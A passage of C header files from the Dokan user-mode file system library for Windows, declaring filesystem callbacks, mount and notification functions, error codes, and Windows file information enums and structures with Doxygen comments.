* specified in DOKAN_OPTIONS when the volume was mounted.
*
* \param VolumeNameBuffer A pointer to a buffer that receives the name of a specified volume.
* \param VolumeNameSize The length of a volume name buffer.
* \param VolumeSerialNumber A pointer to a variable that receives the volume serial number.
* \param MaximumComponentLength A pointer to a variable that receives the maximum length.
* \param FileSystemFlags A pointer to a variable that receives flags associated with the specified file system.
* \param FileSystemNameBuffer A pointer to a buffer that receives the name of the file system.
* \param FileSystemNameSize The length of the file system name buffer.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx"> GetVolumeInformation function (MSDN)</a>
* \see GetDiskFreeSpace
*/
NTSTATUS(DOKAN_CALLBACK *GetVolumeInformation)(LPWSTR VolumeNameBuffer,
DWORD VolumeNameSize,
LPDWORD VolumeSerialNumber,
LPDWORD MaximumComponentLength,
LPDWORD FileSystemFlags,
LPWSTR FileSystemNameBuffer,
DWORD FileSystemNameSize,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Mounted Dokan API callback
*
* Called when Dokan successfully mounts the volume.
*
* If \ref DOKAN_OPTION_MOUNT_MANAGER is enabled and the drive letter requested is busy,
* the MountPoint can contain a different drive letter that the mount manager assigned us.
*
* \param MountPoint The mount point assign to the instance.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see Unmounted
*/
NTSTATUS(DOKAN_CALLBACK *Mounted)(LPCWSTR MountPoint, PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Unmounted Dokan API callback
*
* Called when Dokan is unmounting the volume.
*
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or \c NTSTATUS appropriate to the request result.
* \see Mounted
*/
NTSTATUS(DOKAN_CALLBACK *Unmounted)(PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetFileSecurity Dokan API callback
*
* Get specified information about the security of a file or directory.
*
* Return \c STATUS_NOT_IMPLEMENTED to let dokan library build a sddl of the current process user with authenticate user rights for context menu.
* Return \c STATUS_BUFFER_OVERFLOW if buffer size is too small.
*
* \since Supported since version 0.6.0. The version must be specified in \ref DOKAN_OPTIONS.Version.
* \param FileName File path requested by the Kernel on the FileSystem.
* \param SecurityInformation A SECURITY_INFORMATION value that identifies the security information being requested.
* \param SecurityDescriptor A pointer to a buffer that receives a copy of the security descriptor of the requested file.
* \param BufferLength Specifies the size, in bytes, of the buffer.
* \param LengthNeeded A pointer to the variable that receives the number of bytes necessary to store the complete security descriptor.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see SetFileSecurity
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa446639(v=vs.85).aspx">GetFileSecurity function (MSDN)</a>
*/
NTSTATUS(DOKAN_CALLBACK *GetFileSecurity)(LPCWSTR FileName,
PSECURITY_INFORMATION SecurityInformation,
PSECURITY_DESCRIPTOR SecurityDescriptor,
ULONG BufferLength,
PULONG LengthNeeded,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetFileSecurity Dokan API callback
*
* Sets the security of a file or directory object.
*
* \since Supported since version 0.6.0. The version must be specified in \ref DOKAN_OPTIONS.Version.
* \param FileName File path requested by the Kernel on the FileSystem.
* \param SecurityInformation Structure that identifies the contents of the security descriptor pointed by \a SecurityDescriptor param.
* \param SecurityDescriptor A pointer to a SECURITY_DESCRIPTOR structure.
* \param BufferLength Specifies the size, in bytes, of the buffer.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see GetFileSecurity
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa379577(v=vs.85).aspx">SetFileSecurity function (MSDN)</a>
*/
NTSTATUS(DOKAN_CALLBACK *SetFileSecurity)(LPCWSTR FileName,
PSECURITY_INFORMATION SecurityInformation,
PSECURITY_DESCRIPTOR SecurityDescriptor,
ULONG BufferLength,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FindStreams Dokan API callback
*
* Retrieve all NTFS Streams informations on the file.
* This is only called if \ref DOKAN_OPTION_ALT_STREAM is enabled.
*
* \since Supported since version 0.8.0. The version must be specified in \ref DOKAN_OPTIONS.Version.
* \param FileName File path requested by the Kernel on the FileSystem.
* \param FillFindStreamData Callback that has to be called with PWIN32_FIND_STREAM_DATA that contain stream information.
* \param FindStreamContext Context for the event to pass to the callback FillFindStreamData.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *FindStreams)(LPCWSTR FileName,
PFillFindStreamData FillFindStreamData,
PVOID FindStreamContext,
PDOKAN_FILE_INFO DokanFileInfo);
} DOKAN_OPERATIONS, *PDOKAN_OPERATIONS;
// clang-format on
/**
* \defgroup DokanMainResult DokanMainResult
* \brief \ref DokanMain \ref DokanCreateFileSystem returns error codes
*/
/** @{ */
/** Dokan mount succeed. */
#define DOKAN_SUCCESS 0
/** Dokan mount error. */
#define DOKAN_ERROR -1
/** Dokan mount failed - Bad drive letter. */
#define DOKAN_DRIVE_LETTER_ERROR -2
/** Dokan mount failed - Can't install driver. */
#define DOKAN_DRIVER_INSTALL_ERROR -3
/** Dokan mount failed - Driver answer that something is wrong. */
#define DOKAN_START_ERROR -4
/**
* Dokan mount failed.
* Can't assign a drive letter or mount point.
* Probably already used by another volume.
*/
#define DOKAN_MOUNT_ERROR -5
/**
* Dokan mount failed.
* Mount point is invalid.
*/
#define DOKAN_MOUNT_POINT_ERROR -6
/**
* Dokan mount failed.
* Requested an incompatible version.
*/
#define DOKAN_VERSION_ERROR -7
/** @} */
/**
* \defgroup Dokan Dokan
*/
/** @{ */
/**
* \brief Initialize all required Dokan internal resources.
*
* This needs to be called only once before trying to use \ref DokanMain or \ref DokanCreateFileSystem for the first time.
* Otherwise both will fail and raise an exception.
*/
VOID DOKANAPI DokanInit();
/**
* \brief Release all allocated resources by \ref DokanInit when they are no longer needed.
*
* This should be called when the application no longer expects to create a new FileSystem with
* \ref DokanMain or \ref DokanCreateFileSystem and after all devices are unmount.
*/
VOID DOKANAPI DokanShutdown();
/**
* \brief Mount a new Dokan Volume.
*
* This function block until the device is unmounted.
* If the mount fails, it will directly return a \ref DokanMainResult error.
*
* See \ref DokanCreateFileSystem to create mount Dokan Volume asynchronously.
*
* \param DokanOptions a \ref DOKAN_OPTIONS that describe the mount.
* \param DokanOperations Instance of \ref DOKAN_OPERATIONS that will be called for each request made by the kernel.
* \return \ref DokanMainResult status.
*/
int DOKANAPI DokanMain(PDOKAN_OPTIONS DokanOptions,
PDOKAN_OPERATIONS DokanOperations);
/**
* \brief Mount a new Dokan Volume.
*
* It is mandatory to have called \ref DokanInit previously to use this API.
*
* This function returns directly on device mount or on failure.
* See \ref DokanMainResult for possible errors.
*
* \ref DokanWaitForFileSystemClosed can be used to wait until the device is unmount.
*
* \param DokanOptions a \ref DOKAN_OPTIONS that describe the mount.
* \param DokanOperations Instance of \ref DOKAN_OPERATIONS that will be called for each request made by the kernel.
* \param DokanInstance Dokan mount instance context that can be used for related instance calls like \ref DokanIsFileSystemRunning .
* \return \ref DokanMainResult status.
*/
int DOKANAPI DokanCreateFileSystem(_In_ PDOKAN_OPTIONS DokanOptions,
_In_ PDOKAN_OPERATIONS DokanOperations,
_Out_ DOKAN_HANDLE *DokanInstance);
/**
* \brief Check if the FileSystem is still running or not.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \return Whether the FileSystem is still running or not.
*/
BOOL DOKANAPI DokanIsFileSystemRunning(_In_ DOKAN_HANDLE DokanInstance);
/**
* \brief Wait until the FileSystem is unmount.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \return See <a href="https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject">WaitForSingleObject</a> for a description of return values.
*/
DWORD DOKANAPI DokanWaitForFileSystemClosed(_In_ DOKAN_HANDLE DokanInstance,
_In_ DWORD dwMilliseconds);
/**
* \brief Unmount the Dokan instance.
*
* Unmount and wait until all resources of the \c DokanInstance are released.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
*/
VOID DOKANAPI DokanCloseHandle(_In_ DOKAN_HANDLE DokanInstance);
/**
* \brief Unmount a Dokan device from a driver letter.
*
* \param DriveLetter Dokan driver letter to unmount.
* \return \c TRUE if device was unmounted or \c FALSE in case of failure or device not found.
*/
BOOL DOKANAPI DokanUnmount(WCHAR DriveLetter);
/**
* \brief Unmount a Dokan device from a mount point
*
* \param MountPoint Mount point to unmount ("Z", "Z:", "Z:\", "Z:\MyMountPoint").
* \return \c TRUE if device was unmounted or \c FALSE in case of failure or device not found.
*/
BOOL DOKANAPI DokanRemoveMountPoint(LPCWSTR MountPoint);
/**
* \brief Checks whether Name matches Expression
*
* Behave like \c FsRtlIsNameInExpression routine from <a href="https://msdn.microsoft.com/en-us/library/ff546850(v=VS.85).aspx">Microsoft</a>\n
* \c * (asterisk) Matches zero or more characters.\n
* <tt>?</tt> (question mark) Matches a single character.\n
* \c DOS_DOT (\c " quotation mark) Matches either a period or zero characters beyond the name string.\n
* \c DOS_QM (\c > greater than) Matches any single character or, upon encountering a period or end
* of name string, advances the expression to the end of the set of
* contiguous DOS_QMs.\n
* \c DOS_STAR (\c < less than) Matches zero or more characters until encountering and matching
* the final \c . in the name.
*
* \param Expression Expression can contain any of the above characters.
* \param Name Name to check
* \param IgnoreCase Case sensitive or not
* \return result if name matches the expression
*/
BOOL DOKANAPI DokanIsNameInExpression(LPCWSTR Expression, LPCWSTR Name,
BOOL IgnoreCase);
/**
* \brief Get the version of Dokan.
* The returned ULONG is the version number without the dots.
* \return The version of Dokan
*/
ULONG DOKANAPI DokanVersion();
/**
* \brief Get the version of the Dokan driver.
* The returned ULONG is the version number without the dots.
* \return The version of Dokan driver.
*/
ULONG DOKANAPI DokanDriverVersion();
/**
* \brief Extends the timeout of the current IO operation in driver.
*
* \param Timeout Extended time in milliseconds requested.
* \param DokanFileInfo \ref DOKAN_FILE_INFO of the operation to extend.
* \return If the operation was successful.
*/
BOOL DOKANAPI DokanResetTimeout(ULONG Timeout, PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Get the handle to Access Token.
*
* This method needs be called in \ref DOKAN_OPERATIONS.ZwCreateFile callback.
* The caller must call <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms724211(v=vs.85).aspx">CloseHandle</a>
* for the returned handle.
*
* \param DokanFileInfo \ref DOKAN_FILE_INFO of the operation to extend.
* \return A handle to the account token for the user on whose behalf the code is running.
*/
HANDLE DOKANAPI DokanOpenRequestorToken(PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Get active Dokan mount points.
*
* Returned array need to be released by calling \ref DokanReleaseMountPointList
*
* \param uncOnly Get only instances that have UNC Name.
* \param nbRead Number of instances successfully retrieved.
* \return Allocate array of DOKAN_MOUNT_POINT_INFO.
*/
PDOKAN_MOUNT_POINT_INFO DOKANAPI DokanGetMountPointList(BOOL uncOnly, PULONG nbRead);
/**
* \brief Release Mount point list resources from \ref DokanGetMountPointList.
*
* After \ref DokanGetMountPointList call you will receive a dynamically allocated array of DOKAN_MOUNT_POINT_INFO.
* This array needs to be released when no longer needed by calling this function.
*
* \param list Allocated array of DOKAN_MOUNT_POINT_INFO from \ref DokanGetMountPointList.
* \return Nothing.
*/
VOID DOKANAPI DokanReleaseMountPointList(PDOKAN_MOUNT_POINT_INFO list);
/**
* \brief Convert \ref DOKAN_OPERATIONS.ZwCreateFile parameters to <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> parameters.
*
* Dokan Kernel forward the DesiredAccess directly from the IRP_MJ_CREATE.
* This DesiredAccess has been converted from generic rights (user CreateFile request) to standard rights and will be converted back here.
* https://msdn.microsoft.com/windows/hardware/drivers/ifs/access-mask
*
* \param DesiredAccess DesiredAccess from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param FileAttributes FileAttributes from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param CreateOptions CreateOptions from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param CreateDisposition CreateDisposition from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param outDesiredAccess New <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> dwDesiredAccess.
* \param outFileAttributesAndFlags New <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> dwFlagsAndAttributes.
* \param outCreationDisposition New <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> dwCreationDisposition.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile function (MSDN)</a>
*/
VOID DOKANAPI DokanMapKernelToUserCreateFileFlags(
ACCESS_MASK DesiredAccess, ULONG FileAttributes, ULONG CreateOptions,
ULONG CreateDisposition, ACCESS_MASK *outDesiredAccess,
DWORD *outFileAttributesAndFlags, DWORD *outCreationDisposition);
/**
* \defgroup DokanNotify Dokan Notify
* \brief Dokan User FS file-change notification
*
* The application implementing the user file system can notify
* the Dokan kernel driver of external file- and directory-changes.
*
* For example, the mirror application can notify the driver about
* changes made in the mirrored directory so that those changes will
* be automatically reflected in the implemented mirror file system.
*
* This requires the FilePath passed to the respective DokanNotify*-functions
* to include the absolute path of the changed file including the drive-letter
* and the path to the mount point, e.g. "C:\Dokan\ChangedFile.txt".
*
* These functions SHOULD NOT be called from within the implemented
* file system and thus be independent of any Dokan file system operation.
* @{
*/
/**
* \brief Notify dokan that a file or a directory has been created.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \param IsDirectory Indicates if the path is a directory.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyCreate(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath, _In_ BOOL IsDirectory);
/**
* \brief Notify dokan that a file or a directory has been deleted.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \param IsDirectory Indicates if the path was a directory.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyDelete(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath, _In_ BOOL IsDirectory);
/**
* \brief Notify dokan that file or directory attributes have changed.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyUpdate(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath);
/**
* \brief Notify dokan that file or directory extended attributes have changed.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyXAttrUpdate(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath);
/**
* \brief Notify dokan that a file or a directory has been renamed. This method
* supports in-place rename for file/directory within the same parent.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param OldPath Old, absolute path to the file or directory, including the mount-point of the file system.
* \param NewPath New, absolute path to the file or directory, including the mount-point of the file system.
* \param IsDirectory Indicates if the path is a directory.
* \param IsInSameDirectory Indicates if the file or directory have the same parent directory.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyRename(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR OldPath, _In_ LPCWSTR NewPath,
_In_ BOOL IsDirectory,
_In_ BOOL IsInSameDirectory);
/**@}*/
/**
* \brief Convert WIN32 error to NTSTATUS
*
* https://support.microsoft.com/en-us/kb/113996
*
* \param Error Win32 Error to convert
* \return NTSTATUS associate to the ERROR.
*/
NTSTATUS DOKANAPI DokanNtStatusFromWin32(DWORD Error);
/** @} */
#ifdef __cplusplus
}
#endif
#endif // DOKAN_H_
================================================
FILE: includes/fileinfo.h
================================================
/*
Dokan : user-mode file system library for Windows
Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> and Maxime C. <maxime@islog.com>
Copyright (C) 2007 - 2011 Hiroki Asakawa <info@dokan-dev.net>
http://dokan-dev.github.io
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your option) any
later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef FILEINFO_H_
#define FILEINFO_H_
#define IRP_MJ_CREATE 0x00
#define IRP_MJ_CREATE_NAMED_PIPE 0x01
#define IRP_MJ_CLOSE 0x02
#define IRP_MJ_READ 0x03
#define IRP_MJ_WRITE 0x04
#define IRP_MJ_QUERY_INFORMATION 0x05
#define IRP_MJ_SET_INFORMATION 0x06
#define IRP_MJ_QUERY_EA 0x07
#define IRP_MJ_SET_EA 0x08
#define IRP_MJ_FLUSH_BUFFERS 0x09
#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b
#define IRP_MJ_DIRECTORY_CONTROL 0x0c
#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d
#define IRP_MJ_DEVICE_CONTROL 0x0e
#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f
#define IRP_MJ_SHUTDOWN 0x10
#define IRP_MJ_LOCK_CONTROL 0x11
#define IRP_MJ_CLEANUP 0x12
#define IRP_MJ_CREATE_MAILSLOT 0x13
#define IRP_MJ_QUERY_SECURITY 0x14
#define IRP_MJ_SET_SECURITY 0x15
#define IRP_MJ_POWER 0x16
#define IRP_MJ_SYSTEM_CONTROL 0x17
#define IRP_MJ_DEVICE_CHANGE 0x18
#define IRP_MJ_QUERY_QUOTA 0x19
#define IRP_MJ_SET_QUOTA 0x1a
#define IRP_MJ_PNP 0x1b
#define IRP_MJ_PNP_POWER IRP_MJ_PNP
#define IRP_MJ_MAXIMUM_FUNCTION 0x1b
#define IRP_MN_LOCK 0x01
#define IRP_MN_UNLOCK_SINGLE 0x02
#define IRP_MN_UNLOCK_ALL 0x03
#define IRP_MN_UNLOCK_ALL_BY_KEY 0x04
typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileFullDirectoryInformation, // 2
FileBothDirectoryInformation, // 3
FileBasicInformation, // 4
FileStandardInformation, // 5
FileInternalInformation, // 6
FileEaInformation, // 7
FileAccessInformation, // 8
FileNameInformation, // 9
FileRenameInformation, // 10
FileLinkInformation, // 11
FileNamesInformation, // 12
FileDispositionInformation, // 13
FilePositionInformation, // 14
FileFullEaInformation, // 15
FileModeInformation, // 16
FileAlignmentInformation, // 17
FileAllInformation, // 18
FileAllocationInformation, // 19
FileEndOfFileInformation, // 20
FileAlternateNameInformation, // 21
FileStreamInformation, // 22
FilePipeInformation, // 23
FilePipeLocalInformation, // 24
FilePipeRemoteInformation, // 25
FileMailslotQueryInformation, // 26
FileMailslotSetInformation, // 27
FileCompressionInformation, // 28
FileObjectIdInformation, // 29
FileCompletionInformation, // 30
FileMoveClusterInformation, // 31
FileQuotaInformation, // 32
FileReparsePointInformation, // 33
FileNetworkOpenInformation, // 34
FileAttributeTagInformation, // 35
FileTrackingInformation, // 36
FileIdBothDirectoryInformation, // 37
FileIdFullDirectoryInformation, // 38
FileValidDataLengthInformation, // 39
FileShortNameInformation, // 40
FileIoCompletionNotificationInformation, // 41
FileIoStatusBlockRangeInformation, // 42
FileIoPriorityHintInformation, // 43
FileSfioReserveInformation, // 44
FileSfioVolumeInformation, // 45
FileHardLinkInformation, // 46
FileProcessIdsUsingFileInformation, // 47
FileNormalizedNameInformation, // 48
FileNetworkPhysicalNameInformation, // 49
FileIdGlobalTxDirectoryInformation, // 50
FileIsRemoteDeviceInformation, // 51
FileUnusedInformation, // 52
FileNumaNodeInformation, // 53
FileStandardLinkInformation, // 54
FileRemoteProtocolInformation, // 55
//
// These are special versions of these operations (defined earlier)
// which can be used by kernel mode drivers only to bypass security
// access checks for Rename and HardLink operations. These operations
// are only recognized by the IOManager, a file system should never
// receive these.
//
FileRenameInformationBypassAccessCheck, // 56
FileLinkInformationBypassAccessCheck, // 57
//
// End of special information classes reserved for IOManager.
//
FileVolumeNameInformation, // 58
FileIdInformation, // 59
FileIdExtdDirectoryInformation, // 60
FileReplaceCompletionInformation, // 61
FileHardLinkFullIdInformation, // 62
FileIdExtdBothDirectoryInformation, // 63
FileDispositionInformationEx, // 64
FileRenameInformationEx, // 65
FileRenameInformationExBypassAccessCheck, // 66
FileDesiredStorageClassInformation, // 67
FileStatInformation, // 68
FileMemoryPartitionInformation, // 69
FileMaximumInformation
} FILE_INFORMATION_CLASS,
*PFILE_INFORMATION_CLASS;
typedef enum _FSINFOCLASS {
FileFsVolumeInformation = 1,
FileFsLabelInformation, // 2
FileFsSizeInformation, // 3
FileFsDeviceInformation, // 4
FileFsAttributeInformation, // 5
FileFsControlInformation, // 6
FileFsFullSizeInformation, // 7
FileFsObjectIdInformation, // 8
FileFsDriverPathInformation, // 9
FileFsVolumeFlagsInformation, // 10
FileFsMaximumInformation
} FS_INFORMATION_CLASS,
*PFS_INFORMATION_CLASS;
/**
* \struct FILE_ALIGNMENT_INFORMATION
* \brief Used as an argument to the ZwQueryInformationFile routine.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
*/
typedef struct _FILE_ALIGNMENT_INFORMATION {
/**
* The buffer alignment required by the underlying device. For a list of system-defined values, see DEVICE_OBJECT.
* The value must be one of the FILE_XXX_ALIGNMENT values defined in Wdm.h.
* For more information, see DEVICE_OBJECT and Initializing a Device Object.
*/
ULONG AlignmentRequirement;
} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
/**
* \struct FILE_NAME_INFORMATION
* \brief Used as argument to the ZwQueryInformationFile and ZwSetInformationFile routines.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileNameInformation
*/
typedef struct _FILE_NAME_INFORMATION {
/**
* Specifies the length, in bytes, of the file name string.
*/
ULONG FileNameLength;
/**
* Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
/**
* \struct FILE_ATTRIBUTE_TAG_INFORMATION
* \brief Used as an argument to ZwQueryInformationFile.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAttributeTagInformation
*/
typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
/**
* Specifies one or more FILE_ATTRIBUTE_XXX flags.
* For descriptions of these flags, see the documentation of the GetFileAttributes function in the Microsoft Windows SDK.
*/
ULONG FileAttributes;
/**
* Specifies the reparse point tag. If the FileAttributes member includes the FILE_ATTRIBUTE_REPARSE_POINT attribute flag,
* this member specifies the reparse tag. Otherwise, this member is unused.
*/
ULONG ReparseTag;
} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
/**
* \struct FILE_DISPOSITION_INFORMATION
* \brief Used as an argument to the ZwSetInformationFile routine.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileDispositionInformation
*/
typedef struct _FILE_DISPOSITION_INFORMATION {
/**
* Indicates whether the operating system file should delete the file when the file is closed.
* Set this member to TRUE to delete the file when it is closed.
* Otherwise, set to FALSE. Setting this member to FALSE has no effect if the handle was opened with FILE_FLAG_DELETE_ON_CLOSE.
*/
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
#define FILE_DISPOSITION_DO_NOT_DELETE 0x00000000 // Specifies the system should not delete a file.
#define FILE_DISPOSITION_DELETE 0x00000001 // Specifies the system should delete a file.
#define FILE_DISPOSITION_POSIX_SEMANTICS 0x00000002 // Specifies the system should perform a POSIX - style delete.
#define FILE_DISPOSITION_FORCE_IMAGE_SECTION_CHECK 0x00000004 // Specifies the system should force an image section check.
#define FILE_DISPOSITION_ON_CLOSE 0x00000008 // Specifies if the system sets or clears the on - close state.
/**
* \struct FILE_DISPOSITION_INFORMATION_EX
* \brief Used as an argument to the ZwSetInformationFile routine.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileDispositionInformationEx
*/
typedef struct _FILE_DISPOSITION_INFORMATION_EX {
/**
* Specifies what action(s) the system should take with a specific file while deleting.
*
* \li \c FILE_DISPOSITION_DO_NOT_DELETE Specifies the system should not delete a file.
* \li \c FILE_DISPOSITION_DELETE Specifies the system should delete a file.
* \li \c FILE_DISPOSITION_POSIX_SEMANTICS Specifies the system should perform a POSIX-style delete.
* \li \c FILE_DISPOSITION_FORCE_IMAGE_SECTION_CHECK Specifies the system should force an image section check.
* \li \c FILE_DISPOSITION_ON_CLOSE Specifies if the system sets or clears the on-close state.
*/
ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, *PFILE_DISPOSITION_INFORMATION_EX;
/**
* \struct FILE_END_OF_FILE_INFORMATION
* \brief Used as an argument to the ZwSetInformationFile routine.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileEndOfFileInformation
*/
typedef struct _FILE_END_OF_FILE_INFORMATION {
/**
* The absolute new end of file position as a byte offset from the start of the file.
*/
LARGE_INTEGER EndOfFile;
} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
/**
* \struct FILE_VALID_DATA_LENGTH_INFORMATION
* \brief Used as an argument to ZwSetInformationFile.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileValidDataLengthInformation
*/
typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
/**
* Specifies the new valid data length for the file.
* This parameter must be a positive value that is greater than the current valid data length, but less than or equal to the current file size.
*/
LARGE_INTEGER ValidDataLength;
} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
/**
* \struct FILE_BASIC_INFORMATION
* \brief Used as an argument to routines that query or set file information.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileBasicInformation and FileAllInformation
*/
typedef struct _FILE_BASIC_INFORMATION {
/**
* Specifies the time that the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Specifies the time that the file was last accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Specifies the time that the file was last written to.
*/
LARGE_INTEGER LastWriteTime;
/**
* Specifies the last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Specifies one or more FILE_ATTRIBUTE_XXX flags. For descriptions of these flags,
* see the documentation for the GetFileAttributes function in the Microsoft Windows SDK.
*/
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
/**
* \struct FILE_STANDARD_INFORMATION
* \brief Used as an argument to routines that query or set file information.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileStandardInformation and FileAllInformation
*/
typedef struct _FILE_STANDARD_INFORMATION {
/**
* The file allocation size in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* The end of file location as a byte offset.
*/
LARGE_INTEGER EndOfFile;
/**
* The number of hard links to the file.
*/
ULONG NumberOfLinks;
/**
* The delete pending status. TRUE indicates that a file deletion has been requested.
*/
BOOLEAN DeletePending;
/**
* The file directory status. TRUE indicates the file object represents a directory.
*/
BOOLEAN Directory;
} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION;
/**
* \struct FILE_POSITION_INFORMATION
* \brief Used as an argument to routines that query or set file information.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FilePositionInformation and FileAllInformation
*/
typedef struct _FILE_POSITION_INFORMATION {
/**
* The byte offset of the current file pointer.
*/
LARGE_INTEGER CurrentByteOffset;
} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
/**
* \struct FILE_DIRECTORY_INFORMATION
* \brief Used to query detailed information for the files in a directory.
*/
typedef struct _FILE_DIRECTORY_INFORMATION {
/**
* Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Time when the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Last time the file was accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Last time information was written to the file.
*/
LARGE_INTEGER LastWriteTime;
/**
* Last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Absolute new end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file.
* Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
